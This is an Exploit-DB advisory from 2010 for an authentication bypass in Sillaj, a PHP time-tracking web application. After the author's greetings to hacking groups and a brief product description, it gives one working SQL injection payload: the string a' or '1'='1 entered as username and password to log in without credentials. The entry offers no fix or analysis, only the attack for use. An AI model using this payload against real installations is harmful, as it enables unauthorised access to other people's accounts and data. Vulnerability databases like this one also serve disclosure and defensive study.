Sillaj time tracking tool Authentication Bypass

2010-07-10T00:00:00
ID EDB-ID:14324
Type exploitdb
Reporter L0rd CrusAd3r
Modified 2010-07-10T00:00:00

Description

Sillaj time tracking tool Authentication Bypass. Webapps exploit for php platform

                                        
                                            Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Sillaj Authentication Bypass
Vendor url:http://sillaj.sourceforge.net/
Version:1
Published: 2010-07-11
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat,
Sai, KD, M4n0j.
Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com
Shoutzz:- To all ICW members.
~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:

Sillaj is a PHP time tracking tool. It allows you to register time on
projects and tasks and create various reports. Multiuser and multilanguage,
it uses a database backend and is themable through Smarty templates. Code:
PHP 4.0

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~

Vulnerability:

*Authentication Bypass

Use the string a' or '1'='1 for Username and Password to gain access.

# 0day n0 m0re #
# L0rd CrusAd3r #


-- 
With R3gards,
L0rd CrusAd3r